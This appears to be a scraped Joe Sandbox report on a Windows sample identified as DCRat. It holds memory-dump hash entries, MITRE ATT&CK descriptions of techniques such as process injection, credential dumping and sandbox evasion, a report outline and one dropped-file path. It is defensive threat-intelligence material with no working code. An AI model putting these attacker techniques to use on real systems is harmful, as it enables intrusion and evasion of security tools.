Source File: 00000026.00000002.2206775874.00007FFD9BAB5000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB5000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_7ffd9bab5000_ruRRsbcJNKBbiFjvLZZICNpuYz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1cb240ca3c5380b66ec786ee67419090a833c3900b11ce5e45e08a7e97b80817
Instruction ID: 7c84d01e771fcffdfaf5c1564d8bfccbc62d9b1b50b47bd4b4114e618ccd233a
Opcode Fuzzy Hash: 1cb240ca3c5380b66ec786ee67419090a833c3900b11ce5e45e08a7e97b80817
Instruction Fuzzy Hash: F9014972F0D55D8FE7109B54D4612FC7BE0EF45310F414172D568D32D5DAB869098B81

Function 00007FFD9BAC0508 Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000026.00000002.2206775874.00007FFD9BABA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BABA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_7ffd9baba000_ruRRsbcJNKBbiFjvLZZICNpuYz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3120abb187665d6f9d3cf9795dee914540f7a3e90523487285b8bfc948726fb0
Instruction ID: 04acab71173adc892474981a1e89336ceb31ce316c15436fe324ae638f3097da
Opcode Fuzzy Hash: 3120abb187665d6f9d3cf9795dee914540f7a3e90523487285b8bfc948726fb0
Instruction Fuzzy Hash: AC21A770A0A12D8FEBB0EB9488547FD77B0BB04711F5145B9C40DD72A1DEB99A849F04

Function 00007FFD9BAE4639 Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000026.00000002.2206775874.00007FFD9BAE3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE3000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_7ffd9bae3000_ruRRsbcJNKBbiFjvLZZICNpuYz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1161074214c59cb297485515f00ba833b87358c32f80bc5eff3850f85ca1f73f
Instruction ID: e7629c13f3fc146eb6baddbf41fcf114c35aba3baebe2eb814b5302dff3513d4
Opcode Fuzzy Hash: 1161074214c59cb297485515f00ba833b87358c32f80bc5eff3850f85ca1f73f
Instruction Fuzzy Hash: 1C115E7090868D8FCF85EF68C858AEA7BF0FF29304F0105AAE459D7261DB349954CB81

Function 00007FFD9BAB7B41 Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000026.00000002.2206775874.00007FFD9BAB5000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB5000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_7ffd9bab5000_ruRRsbcJNKBbiFjvLZZICNpuYz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3b81ba25b043a36f91ce63c594d089475aad4b28bbb1e5a6bf4f489b386a1595
Instruction ID: d120a91c050d543646e08c2e3f76a0d5a3d38f1d6907449b1163975cd4daef7b
Opcode Fuzzy Hash: 3b81ba25b043a36f91ce63c594d089475aad4b28bbb1e5a6bf4f489b386a1595
Instruction Fuzzy Hash: F8015670A2868CCFCB85EF18C895AD97BE0FF19304F0602AAE859D3261D774E950CF81

Function 00007FFD9BABD6F9 Relevance: .0, Instructions: 48COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000026.00000002.2206775874.00007FFD9BABA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BABA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_7ffd9baba000_ruRRsbcJNKBbiFjvLZZICNpuYz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ce8537245f69b9b00bd964c7ad67a298875ef855abd99d2cb6e4659c2b092793
Instruction ID: 5e8fb774df76411f6519193d4ee53eef97af79a049cdbe2a3ba86d52b0038a7a
Opcode Fuzzy Hash: ce8537245f69b9b00bd964c7ad67a298875ef855abd99d2cb6e4659c2b092793
Instruction Fuzzy Hash: 2801927250E7C96FD7239B2098615807F70AE77244B0905DBC4D49F0A3E629DB56C752

Function 00007FFD9BAA0C50 Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000026.00000002.2206775874.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_7ffd9baa0000_ruRRsbcJNKBbiFjvLZZICNpuYz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 40d50f650372a8140607874d421f31ad4bad78fda63d8d1b34993076fd1eca12
Instruction ID: 70d69f662bdd3d2c341f2479a6311c7f588415e76534d839aef380ee2dafe25a
Opcode Fuzzy Hash: 40d50f650372a8140607874d421f31ad4bad78fda63d8d1b34993076fd1eca12
Instruction Fuzzy Hash: 4F01D271E0E28E8FE7229FA4C8602EAB771EF02711F0545B3D459DB1E2CA782615CB65

Function 00007FFD9BAAB3A2 Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000026.00000002.2206775874.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_7ffd9baa0000_ruRRsbcJNKBbiFjvLZZICNpuYz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5537c81e21c29ab5100b3fd733abac75941d878031bc1a667f5f864665178be3
Instruction ID: ed02b4364fb061a3eec4a2423a99a10c6bf85866cdf6e0840984910d69f69950
Opcode Fuzzy Hash: 5537c81e21c29ab5100b3fd733abac75941d878031bc1a667f5f864665178be3
Instruction Fuzzy Hash: 15211A70E0662D8EEBB0EB14C8547ECB3B2EB95311F1041E9C00DA22A1DBB95AD5CF15

Function 00007FFD9BAA8ED2 Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000026.00000002.2206775874.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_7ffd9baa0000_ruRRsbcJNKBbiFjvLZZICNpuYz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2d3908c6a8591edd985ba8eb1238f4e1f4ac7b3b4cd93431749f504880a843be
Instruction ID: 4a5519970e0f966f275d5fd54d0df239a2b60970423a9c7dff05f2f7c30bc2cc
Opcode Fuzzy Hash: 2d3908c6a8591edd985ba8eb1238f4e1f4ac7b3b4cd93431749f504880a843be
Instruction Fuzzy Hash: F811FE70D1956D8EEB78DB54C8647ECB6B1AB54705F4141FAD00DA22A1DBB86BC4CF10

Function 00007FFD9BAF23B9 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000026.00000002.2206775874.00007FFD9BAE9000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE9000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_7ffd9bae9000_ruRRsbcJNKBbiFjvLZZICNpuYz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 55a5290955d8ddcc6bd60bdca8093cc84c938eaf4b9126dd96a233380623d043
Instruction ID: c9fc40f11a45e419fd342d62d2d26123e3b9a957a5932557c5f013dbcefd2661
Opcode Fuzzy Hash: 55a5290955d8ddcc6bd60bdca8093cc84c938eaf4b9126dd96a233380623d043
Instruction Fuzzy Hash: 4B014C70A0978D8FCB85DF68C854AAA7BF0FF65300F0505AAD458C72A1D7749954CB80

Function 00007FFD9BAF5030 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000026.00000002.2206775874.00007FFD9BAE9000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE9000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_7ffd9bae9000_ruRRsbcJNKBbiFjvLZZICNpuYz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 295c6a7896b65db21397cd87a995783c38f34a5d8d48e4121f6eddf9c24249ca
Instruction ID: c8533e0bfe99cdbd7f17baa1993c2b9f1b8505c2a7733e9bd66c9468226f8ed4
Opcode Fuzzy Hash: 295c6a7896b65db21397cd87a995783c38f34a5d8d48e4121f6eddf9c24249ca
Instruction Fuzzy Hash: 1A01A870914A4D9FDF84EF68C849AEE7BF0FB68305F00456AA81DD3260DB71E594CB81

Function 00007FFD9BAB8035 Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000026.00000002.2206775874.00007FFD9BAB5000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB5000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_7ffd9bab5000_ruRRsbcJNKBbiFjvLZZICNpuYz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f65eca440a64c5ba35bdc9aabb084066f29eff3a0bb50c74b4d6b22c3155d707
Instruction ID: c5dfd0658afcc37f10851c1dc6983f5b1194a7eb614835e7bd9accb086b557aa
Opcode Fuzzy Hash: f65eca440a64c5ba35bdc9aabb084066f29eff3a0bb50c74b4d6b22c3155d707
Instruction Fuzzy Hash: 9C018B3091868D8FDB54DF18C8565E93BE0FF28354F4502AAE84883292D738E654CB82

Function 00007FFD9BABFB68 Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000026.00000002.2206775874.00007FFD9BABA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BABA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_7ffd9baba000_ruRRsbcJNKBbiFjvLZZICNpuYz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2c77e429b9cc89bbe489d74be015a8c87a71a5f89075ebf4900a319e9c9e7f6d
Instruction ID: 388ca579213080dcbd784d2ec8f4ee0d1e92ac0b440fa953a6c95100977e3799
Opcode Fuzzy Hash: 2c77e429b9cc89bbe489d74be015a8c87a71a5f89075ebf4900a319e9c9e7f6d
Instruction Fuzzy Hash: AC01C030E0592E8BEB68EF44C820ABEB7B0FF44315F454279D06A96294CF786A458F40

Function 00007FFD9BAEA039 Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000026.00000002.2206775874.00007FFD9BAE9000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE9000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_7ffd9bae9000_ruRRsbcJNKBbiFjvLZZICNpuYz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a1a0c888b407fc4916fa2aadebc8244149b91c2ed4ca0ecef2b0238398fa1a18
Instruction ID: a4050df555f488741ee2181641648f5756a24f1fc8533b26d6aa37f914947012
Opcode Fuzzy Hash: a1a0c888b407fc4916fa2aadebc8244149b91c2ed4ca0ecef2b0238398fa1a18
Instruction Fuzzy Hash: D1014F3090968D8FCB85EF68C869AA97FF0FF65301F0540DAD449C71A2DB759994CB41

Function 00007FFD9BAF1AE9 Relevance: .0, Instructions: 40COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000026.00000002.2206775874.00007FFD9BAE9000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE9000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_7ffd9bae9000_ruRRsbcJNKBbiFjvLZZICNpuYz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5f314b03b039e9d9515eec0a7e4703d85b087c5335f9ebda5f69decfa730e8d5
Instruction ID: 2712cf6dc19aad81ac0f88910a3317fc94539f3211e34c3121169090358a271e
Opcode Fuzzy Hash: 5f314b03b039e9d9515eec0a7e4703d85b087c5335f9ebda5f69decfa730e8d5
Instruction Fuzzy Hash: 9201623190868C8FCB45DF54C454AD97FB0FF65300F0501EAD408C7262D7759954CB80

Function 00007FFD9BAF9769 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000026.00000002.2206775874.00007FFD9BAE9000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE9000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_7ffd9bae9000_ruRRsbcJNKBbiFjvLZZICNpuYz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7dbace84ab49a5d69457dbf48ed94a8396e7e9f234f6691f06c34c3df63067bc
Instruction ID: 182ffd1456ae197b386a63f0b80cbb880a2f44399391fc57fe4282f1b6eba1c0
Opcode Fuzzy Hash: 7dbace84ab49a5d69457dbf48ed94a8396e7e9f234f6691f06c34c3df63067bc
Instruction Fuzzy Hash: B3012C30A0978C8FCB95EF64C868AD97FB0FF69300F5501EAD409C72A2D7759994CB41

Function 00007FFD9BAA06A5 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000026.00000002.2206775874.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_7ffd9baa0000_ruRRsbcJNKBbiFjvLZZICNpuYz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 92729382008f01731ed0f3a022329951a15473e739d85a2b7bbb80f74b8879ef
Instruction ID: 8e071c47a73b589626a11ed47b4ae5de0543cb083a9f89e1f42bad84c56b20bc
Opcode Fuzzy Hash: 92729382008f01731ed0f3a022329951a15473e739d85a2b7bbb80f74b8879ef
Instruction Fuzzy Hash: 0AF09030A15A4E9FEB60EF58C8486EE77A1FF64704F010036E41CC21A0DAB062908B80

Function 00007FFD9BAB784D Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000026.00000002.2206775874.00007FFD9BAB5000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB5000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_7ffd9bab5000_ruRRsbcJNKBbiFjvLZZICNpuYz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3134fcc554d0516bb68dc3845485f5a453e296b74328dc3ac1f000720adfd1ee
Instruction ID: d780d78e3a3c2d9cc597a603950f727c4b417ac5288c18a4a27606d6d22f49dc
Opcode Fuzzy Hash: 3134fcc554d0516bb68dc3845485f5a453e296b74328dc3ac1f000720adfd1ee
Instruction Fuzzy Hash: 17F09A31608A8DCFCB95EF8CC891ADA3FA0FF29300F0501A5E518C7162D7B4E9A4CB81

Function 00007FFD9BAEA050 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000026.00000002.2206775874.00007FFD9BAE9000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE9000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_7ffd9bae9000_ruRRsbcJNKBbiFjvLZZICNpuYz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 02c02c09d3cd9aef7a93f52552581907ff8c328b5f01c4f966af8d523bc721ef
Instruction ID: 0ba353f719700d688700cec9ff334dcffdbe3b6d1e33aa10ec680a3b69508848
Opcode Fuzzy Hash: 02c02c09d3cd9aef7a93f52552581907ff8c328b5f01c4f966af8d523bc721ef
Instruction Fuzzy Hash: 14F0BD3091494DDFDF84EF58C458AAA7BF1FB68305F10419AA41DD3160DB71A694CB80

Function 00007FFD9BAB702D Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000026.00000002.2206775874.00007FFD9BAB5000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB5000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_7ffd9bab5000_ruRRsbcJNKBbiFjvLZZICNpuYz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 21b1b4ef42fa06e85fabd238672aa1cc7511190daa2ff9e830c3cbf310c96c4c
Instruction ID: b5ab72fde972c4976b6d9f8351bf9e5f356f0c13b6cc5ea55de72dc8c85797ee
Opcode Fuzzy Hash: 21b1b4ef42fa06e85fabd238672aa1cc7511190daa2ff9e830c3cbf310c96c4c
Instruction Fuzzy Hash: 88F0903190868DCFCF91EF18C855A993BE0FF19300F0501AAE41CC7162D774E964CB81

Function 00007FFD9BAB6E45 Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000026.00000002.2206775874.00007FFD9BAB5000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB5000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_7ffd9bab5000_ruRRsbcJNKBbiFjvLZZICNpuYz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0e957744cb8f6c1ce7e1691131e4395d9d4808570bedc8bc4b7d05ea09b098e9
Instruction ID: d9494fc31439dd1bdca4f25b8b2daa64883e372002a7baccecb14f0f314f7faf
Opcode Fuzzy Hash: 0e957744cb8f6c1ce7e1691131e4395d9d4808570bedc8bc4b7d05ea09b098e9
Instruction Fuzzy Hash: C2F08C3195E28C9FDB51ABA8886C6ECBFB0EF15301F4504AAE458C60A2EA349254CB02

Function 00007FFD9BAA06C8 Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000026.00000002.2206775874.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_7ffd9baa0000_ruRRsbcJNKBbiFjvLZZICNpuYz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 51e55b1649dd0dcec18c850f60dac779f09d5e67d42e0ba577eeb9683bad4686
Instruction ID: e671d6f21ad19e038b6d7663604e1cf21b6b8665a854fcf24f45d7e1f7b8d5ca
Opcode Fuzzy Hash: 51e55b1649dd0dcec18c850f60dac779f09d5e67d42e0ba577eeb9683bad4686
Instruction Fuzzy Hash: 29F03730D1594E9FDB90EF64C8496FE77E0FF14304F41457AE81CD2160DA70A6A4CB81

Function 00007FFD9BAA815F Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000026.00000002.2206775874.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_7ffd9baa0000_ruRRsbcJNKBbiFjvLZZICNpuYz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a7b6554ab0acc6668de119c683133ccb2c4a84babae0ff0eeac88a1a20671aa9
Instruction ID: 80e82419ad6511794f8c009530631b459697f0cfd2027e96cc4f6eb99d117c66
Opcode Fuzzy Hash: a7b6554ab0acc6668de119c683133ccb2c4a84babae0ff0eeac88a1a20671aa9
Instruction Fuzzy Hash: 5FE0B630B066194FE768DA48D8A0AEA66A1AB44394F5042F5A00D9659ACA742E858F80

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: Ingress Tool Transfer ) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Deletion
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in persistence and execution.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report kJrNOFEGbQ.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: DCRat

Yara Signatures

Initial Sample

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Data Obfuscation

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Program Files (x86)\jDownloader\dca45fe6245a48

